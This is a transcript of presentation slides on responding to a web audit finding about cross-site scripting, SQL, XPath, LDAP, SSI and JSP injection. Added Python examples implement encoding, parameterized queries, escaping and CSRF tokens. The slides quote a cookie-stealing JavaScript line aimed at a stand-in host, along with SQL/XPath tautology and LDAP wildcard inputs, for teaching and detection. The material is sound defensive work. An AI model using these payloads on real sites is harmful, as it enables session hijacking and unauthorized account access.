web audit vulnerability

Upload: alper-kayisi

Post on 07-Apr-2018


TRANSCRIPT

  • 8/6/2019 Web Audit Vulnerability

    1/34

    Web Audit Vulnerability

    cross-site scripting (XSS) concerns

    by Ron Widitz

  • 3/34

    Audit Response

    Either:

    Prove issue to be a non-problem, or

    Describe actions to take

  • 5/34

    Resolution Steps

    Investigate security concerns

    Restate as IT problem(s)

    Determine solution(s)

    Provide audit response

    Mitigate risk

  • 6/34

    Investigation

    Define cross-site scripting (XSS)

    Examine how auditors applied

    Identify risks

    Research preliminary solutions

  • 7/34

    cross-site scripting

    Attacker goal: their code into browser

    XSS forces a website to execute malicious code in browser

    Browser user is the intended victim

    Why? Account hijacking, keystroke recording, intranet hacking, theft

  • 8/34

    XSS concept

  • 9/34

    Auditor finding

    Freeform edit box

    Message to Customer Service

  • 10/34

    XSS types

    Immediate reflection : phishing

    DOM-based : 95 JavaScript methods

    Redirection : header, meta, dynamic

    Multimedia : Flash, QT, PDF scripts

    Cross-Site Request Forgery (CSRF)

    others (e.g. non-persistent search box)

  • 11/34

    Risks

    XSS abuses render engines or plug-ins

    Steal browser cookies

    Steal session info for replay attack

    Malware or bot installation

    Redirect or phishing attempt

  • 12/34

    Our actual risk

    Currently, none.

    Edit box info viewed in thick client

    DHTML or JavaScript needs browser

    Our thick client is Java Swing-based

  • 13/34

    Planned Audit Response

    Could indicate no audit problem

    Might have future impact

    Address through dev standards

    Consider application firewall

    Widen problem scope to include all user agent injection tactics

  • 14/34

    More on Web Attacks

    Cross Site Scripting

    SQL Injection

    XPATH Injection

    LDAP Injection

    SSI (server side inclusion) Injection

    JSP (Java server pages) Injection

  • 15/34

    Artifacts

    For each injection issue:

    Vulnerability description documented

    Preventative coding technique

    Discuss with App Dev teams

    Publish and socialize direction

    Include in peer reviews/code walkthroughs

    Set deadlines for full incorporation

    Communicate with auditors

  • 16/34

    Cross Site Scripting

    Example 1

    Trudy posts the following JavaScript on a message board:

    document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie

    When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

  • 17/34

    Cross Site Scripting

    Example 2

    Trudy sends a link to the following URL to Bob that will take him to a personalized page:

    http://host/personalizedpage.php?username=

  • 18/34

    Cross Site Scripting

    Detection

    A client usually is not supposed to send scripts to servers

    If the server receives <SCRIPT> or the hex equivalent in an incoming packet, and that same script is sent unsanitized in an outgoing packet or in an outgoing SQL statement to the database, then an attack has occurred

    A sanitized script could look like &lt;SCRIPT>
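The three checks the Detection slide describes, written out as an added example (this is not code from the presentation): an ingress check that spots a script tag whether it arrives plain or as its percent-encoded "hex equivalent", the server-side HTML encoding that turns `<SCRIPT>` into `&lt;SCRIPT&gt;`, and the egress check that flags a submission echoed back out unencoded. The sample submissions are constructed; the script body is the message-board payload from Example 1, and the edit-box framing is an assumption.

```python
import html
import re
import urllib.parse

# Constructed sample submissions to a freeform edit box. The second is the
# Example 1 payload wrapped in a script tag; the third is the same payload
# percent-encoded, the "hex equivalent" the Detection slide refers to.
SCRIPT_PAYLOAD = ("<SCRIPT>document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'"
                  "+document.cookie</SCRIPT>")
SAMPLE_SUBMISSIONS = [
    "Please call me back about my order.",
    SCRIPT_PAYLOAD,
    urllib.parse.quote(SCRIPT_PAYLOAD, safe=""),
]

# Opening or closing script tag, any case, with optional whitespace.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def normalize(value: str) -> str:
    """Percent-decode until the value stops changing (bounded to three rounds),
    so a tag hidden behind one or two layers of %XX encoding is inspected in
    its decoded form."""
    for _ in range(3):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def contains_script(value: str) -> bool:
    """Ingress check: a client is not supposed to send scripts to the server."""
    return SCRIPT_TAG.search(normalize(value)) is not None


def encode_for_html(value: str) -> str:
    """Server-side HTML encoding: the browser renders the text rather than
    executing it. '<SCRIPT>' becomes '&lt;SCRIPT&gt;'."""
    return html.escape(value, quote=True)


def leaked_unsanitized(submission: str, outgoing_html: str) -> bool:
    """Egress check: an attack has occurred when a submission that carried a
    script appears verbatim (unencoded) in the response sent back out."""
    return contains_script(submission) and normalize(submission) in outgoing_html


if __name__ == "__main__":
    for s in SAMPLE_SUBMISSIONS:
        stored = encode_for_html(normalize(s))
        print(f"script={contains_script(s)}  stored as: {stored[:60]}")
```

The decoded form is what gets encoded and stored, so the same value is compared on ingress and egress; comparing the raw percent-encoded string against rendered HTML would miss the match.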

  • 19/34

    SQL Injection Example

    Trudy accesses Bob's website, in which he does not validate input on his sign in form

    Runs a SQL statement like the following:

    SELECT * from Accounts where username = 'USER_NAME' and password = 'USER_PASS';

    In the password field, she types as her password:

    X' OR 'x'='x

    Manipulates the server into running the following SQL command:

    SELECT * from Accounts where username = 'USER_NAME' and password='X' OR 'x'='x';

    Selects all account information

  • 20/34

    SQL Injection Detection

    To detect and prevent this at Bob's location:

    Log any traffic from Trudy to Bob containing form data containing a quotation mark

    Match any outgoing SQL statements from Bob's web server to his database server and verify that the quotation marks Trudy supplied were escaped

    If they weren't, take action
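The sign-in statement from the two SQL slides, run both ways against an in-memory SQLite table, as an added example that is not part of the presentation: the concatenated form returns every account when the password field carries `X' OR 'x'='x`, the parameterized form returns nothing, and a small egress check implements the slide's rule that a form value containing a quotation mark must not reach the database unescaped. The Accounts rows and the `balance` column are constructed.

```python
import sqlite3

# Constructed Accounts table standing in for Bob's sign-in backend.
SAMPLE_ACCOUNTS = [("bob", "s3cret", 100), ("alice", "hunter2", 250)]


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Accounts (username TEXT, password TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO Accounts VALUES (?, ?, ?)", SAMPLE_ACCOUNTS)
    return conn


def login_vulnerable(conn, user_name: str, user_pass: str):
    """Builds the slide's statement by concatenation: the quotes Trudy typed
    become part of the SQL, and AND binds tighter than OR, so 'x'='x' makes
    every row match. Returns the rows and the statement actually sent, so the
    egress check below can inspect it."""
    sql = ("SELECT * from Accounts where username = '" + user_name
           + "' and password = '" + user_pass + "';")
    return conn.execute(sql).fetchall(), sql


def login_parameterized(conn, user_name: str, user_pass: str):
    """The same query with bound parameters: the input is data, never SQL text,
    so the quotation marks cannot change the statement's logic."""
    sql = "SELECT * from Accounts where username = ? and password = ?;"
    return conn.execute(sql, (user_name, user_pass)).fetchall()


def unescaped_quote_leaked(form_value: str, outgoing_sql: str) -> bool:
    """Egress check from the Detection slide: the form value carried a
    quotation mark and appears verbatim (quotes not doubled) in the SQL sent
    to the database server. Bound parameters never appear in the text at all."""
    return "'" in form_value and form_value in outgoing_sql


if __name__ == "__main__":
    conn = build_db()
    trudy_password = "X' OR 'x'='x"
    rows, sent = login_vulnerable(conn, "bob", trudy_password)
    print("concatenated:", len(rows), "row(s);", "unescaped quote leaked:",
          unescaped_quote_leaked(trudy_password, sent))
    print("parameterized:", len(login_parameterized(conn, "bob", trudy_password)), "row(s)")
```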

  • 21/34

    XPATH Injection Example

    Similar to SQL injection

    Bob has a form that does not sanitize user-provided input before using it as part of an XPATH query:

    string(//user[name/text()='USER_NAME' and password/text()='USER_PASS']/account/text())

    Trudy again can provide the following password to change the statement's logic:

    X' OR 'x'='x

    The statement thus selects the first account

  • 22/34

    LDAP Injection Example

    Server using LDAP for authentication

    User name initialized, but then uses unchecked user input to create a query:

    filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry

    Attacker can exploit using special characters:

    http://example/ldapsearch.asp?user=*

  • 23/34

    LDAP Injection Detection

    Detection is based off of usage of special LDAP characters

    System monitors input for special characters

    Either scrubs incoming input or watches for unescaped output passed to database server

    Detection approach is blackbox
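Both halves of the LDAP Detection slide, as an added example rather than code from the presentation: the filter from the example slide built once with unchecked input and once with the value escaped per RFC 4515 (the "scrub incoming input" option), plus the egress check that watches for special characters reaching the directory server unescaped. The user names are constructed.

```python
# RFC 4515 escaping for values placed inside an LDAP search filter. A bare "*"
# is the wildcard the example slide's URL sends; "(" and ")" can close and open
# filter components; "\" is the escape character itself; NUL ends C strings.
LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_ldap_filter_value(value: str) -> str:
    """Replace each special character with its \\XX hex form. Working one
    character at a time means the backslash is never escaped twice."""
    return "".join(LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_uid_filter_unchecked(user_name: str) -> str:
    """Mirrors the slide's concatenation: (uid=<input>) with the input as-is."""
    return "(uid=" + user_name + ")"


def build_uid_filter_escaped(user_name: str) -> str:
    """Same filter with the input escaped, so '*' searches for a literal '*'
    rather than matching every entry."""
    return "(uid=" + escape_ldap_filter_value(user_name) + ")"


def has_special_ldap_chars(value: str) -> bool:
    """Ingress monitor: does the submitted value use any special LDAP character?"""
    return any(ch in value for ch in LDAP_FILTER_ESCAPES)


def filter_leaks_special_chars(user_input: str, outgoing_filter: str) -> bool:
    """Egress check: the input carried special characters and appears verbatim
    (unescaped) in the filter sent to the directory server."""
    return has_special_ldap_chars(user_input) and user_input in outgoing_filter


if __name__ == "__main__":
    for name in ("rwiditz", "*", "a)(uid=b"):      # constructed inputs
        print(repr(name), "->", build_uid_filter_unchecked(name),
              "| escaped:", build_uid_filter_escaped(name),
              "| special:", has_special_ldap_chars(name))
```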

  • 24/34

    SSI Injection Example

    Bob has his server configured to use Server-Side Includes

    Trudy passes input with an SSI embedded

    SSI inserts malicious code into normal webpages upon next request

    Future legitimate users get content containing the tainted code included by the SSI

  • 25/34

    SSI Injection Detection

    Bob's system needs SSI enabled, so he uses our system on local servers

    SSI code can be detected by its specific format: HTML comment containing a command

    SSI commands can be stripped on ingress

    Can also deny outgoing packets that do not include SSI as inputted (means successful execution)

    Detection approach is blackbox
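The SSI Detection slide's two options, written out as an added example that is not from the presentation: recognise a directive by its comment-with-command format, strip it on ingress, and on egress treat a response that no longer contains the submitted directive as evidence the server executed it. One refinement is added beyond the slide: a directive that comes back HTML-encoded is counted as present, since encoding (not execution) is what removed it. The submission and responses are constructed; the directive used is the standard `#echo` include.

```python
import html
import re

# An SSI directive is an HTML comment whose body starts with "#command".
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*([a-z]+)\b[^>]*?-->", re.IGNORECASE | re.DOTALL)

# Constructed edit-box submission carrying a (benign) echo directive.
SAMPLE_INPUT = 'Thanks! <!--#echo var="DATE_LOCAL" -->'


def find_ssi_directives(text: str) -> list:
    """Names of the SSI commands present in the text, lower-cased."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(text)]


def strip_ssi(text: str) -> str:
    """Ingress option from the slide: remove SSI directives before storage."""
    return SSI_DIRECTIVE.sub("", text)


def ssi_was_executed(submitted: str, outgoing: str) -> bool:
    """Egress option from the slide: the submission carried a directive and the
    response does not include it as inputted, which means the server processed
    it. A directive that survives in HTML-encoded form was neutralised, not
    executed, so it counts as present."""
    directives = [m.group(0) for m in SSI_DIRECTIVE.finditer(submitted)]
    if not directives:
        return False
    return any(d not in outgoing and html.escape(d) not in outgoing for d in directives)


if __name__ == "__main__":
    print("directives:", find_ssi_directives(SAMPLE_INPUT))
    print("stripped:  ", repr(strip_ssi(SAMPLE_INPUT)))
    # Constructed responses: executed (directive replaced by its output),
    # encoded, and passed through verbatim.
    for body in ("<p>Thanks! Tuesday</p>",
                 "<p>" + html.escape(SAMPLE_INPUT) + "</p>",
                 "<p>" + SAMPLE_INPUT + "</p>"):
        print("executed:", ssi_was_executed(SAMPLE_INPUT, body), "<-", body)
```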

  • 26/34

    JSP Injection Example

    Similar to SSI injection

    Bob has a portal server configured to use dynamic code for templates

    Trudy passes input with an embedded

    malicious code inserted into webpage

  • 27/34

    JSP Injection Prevention

    Prefer static include

    Don't allow file inclusion outside of server via Java2 Security policies

    Firewall rules to prevent outbound requests from server

    Input validation coding

    Choose portal software not requiring dynamic includes or code execution

  • 28/34

    Defense Approaches

    Web firewall/IDS
      ModSecurity for Apache
      Commercial: SecureSphere from Imperva

    Static code analysis
      Open source: Nikto
      Commercial: Acunetix Web Vulnerability Scanner, N-stalker

    Education on good coding
      HTML encoding on input (server-side)
      Input validation/filtering

  • 29/34

    Q&A

    Suggestions?

  • 32/34

    user agent injection

    Stored

    HTTP Response Splitting

    SQL Injection

    XML Injection

    JSP Code Injection

    LDAP Injection

  • 33/34

    Approaches

    Application firewall

    HTML encoding on input (server-side)

    Input validation/filtering

    Coding techniques with output

    Session key enforced to prevent CSRF
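One way to implement the last approach on the slide, a session-bound key that a cross-site request cannot supply, as an added example and not code from the presentation: the anti-CSRF token is an HMAC of the session id under a server secret, so it is tied to one session without having to be stored, and it is compared in constant time before a state-changing POST is accepted. The secret, session ids and the `handle_form_post` framing are constructed assumptions.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret; a real deployment loads it from configuration
# so every worker derives the same tokens.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token_for_session(session_id: str) -> str:
    """Derive the anti-CSRF token from the session id with an HMAC. The token
    is bound to this session and cannot be computed without the secret."""
    return hmac.new(SERVER_SECRET, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, submitted_token: str) -> bool:
    """Constant-time comparison against the token expected for this session."""
    expected = csrf_token_for_session(session_id)
    return hmac.compare_digest(expected, submitted_token)


def handle_form_post(session_cookie: str, form: dict) -> str:
    """Reject a state-changing POST unless the form carries the session's token.
    A page on another site can make the browser send the session cookie, but it
    cannot read the token that was embedded in the legitimate form."""
    if not csrf_token_valid(session_cookie, form.get("csrf_token", "")):
        return "403 Forbidden"
    return "200 OK"


if __name__ == "__main__":
    sid = "session-abc"                       # constructed session id
    token = csrf_token_for_session(sid)       # embedded in the form the server renders
    print("legitimate form:", handle_form_post(sid, {"csrf_token": token}))
    print("cross-site form (no token):", handle_form_post(sid, {}))
    print("token from another session:", handle_form_post("session-xyz", {"csrf_token": token}))
```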

  • 34/34

    XPATH Injection

    Detection

    Again, our system can detect this by matching any submission by Trudy containing a quotation mark against outbound XPATH queries

    Correction can again be done by escaping any rogue quotation marks Trudy may have inserted

    Detection approach is blackbox
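The XPATH example and detection slides together, as an added example that is not from the presentation. XPath 1.0 has no escape sequence for a quotation mark inside a string literal, so the "escaping" correction is done by choosing the delimiter the value does not contain, or, when it contains both, by splitting it into a `concat()` of safe pieces; the egress check then flags a submission whose quotation mark reaches the outbound query without being enclosed by the other delimiter. The query is the one from the example slide; the user name is constructed.

```python
def xpath_string_literal(value: str) -> str:
    """Render a user-supplied value as an XPath 1.0 string literal that cannot
    terminate early: single quotes if the value has none, double quotes if it
    has no double quote, otherwise a concat() of single-quoted pieces joined
    by a double-quoted "'"."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    parts = ["'" + p + "'" for p in value.split("'")]
    return "concat(" + ", \"'\", ".join(parts) + ")"


def build_account_query_unsanitized(user_name: str, user_pass: str) -> str:
    """The slide's query with the input concatenated in. With the password
    X' OR 'x'='x the predicate is always true, and string() over the resulting
    node-set yields the first account."""
    return ("string(//user[name/text()='" + user_name + "' and password/text()='"
            + user_pass + "']/account/text())")


def build_account_query_safe(user_name: str, user_pass: str) -> str:
    """Same query with every user value rendered by xpath_string_literal."""
    return ("string(//user[name/text()=" + xpath_string_literal(user_name)
            + " and password/text()=" + xpath_string_literal(user_pass)
            + "]/account/text())")


def rogue_quote_leaked(submission: str, outgoing_query: str) -> bool:
    """Egress check from the Detection slide: the submission contained a
    quotation mark and appears in the outbound query without being enclosed in
    a literal delimited by the other quote character. A concat() rendering
    never contains the submission verbatim, so it is not flagged."""
    if "'" not in submission and '"' not in submission:
        return False
    start = outgoing_query.find(submission)
    while start != -1:
        end = start + len(submission)
        before = outgoing_query[start - 1] if start > 0 else ""
        after = outgoing_query[end:end + 1]
        safely_delimited = (before == after and before in ("'", '"')
                            and before not in submission)
        if not safely_delimited:
            return True
        start = outgoing_query.find(submission, start + 1)
    return False


if __name__ == "__main__":
    trudy_password = "X' OR 'x'='x"
    for build in (build_account_query_unsanitized, build_account_query_safe):
        q = build("bob", trudy_password)          # "bob" is a constructed user name
        print(rogue_quote_leaked(trudy_password, q), "<-", q)
```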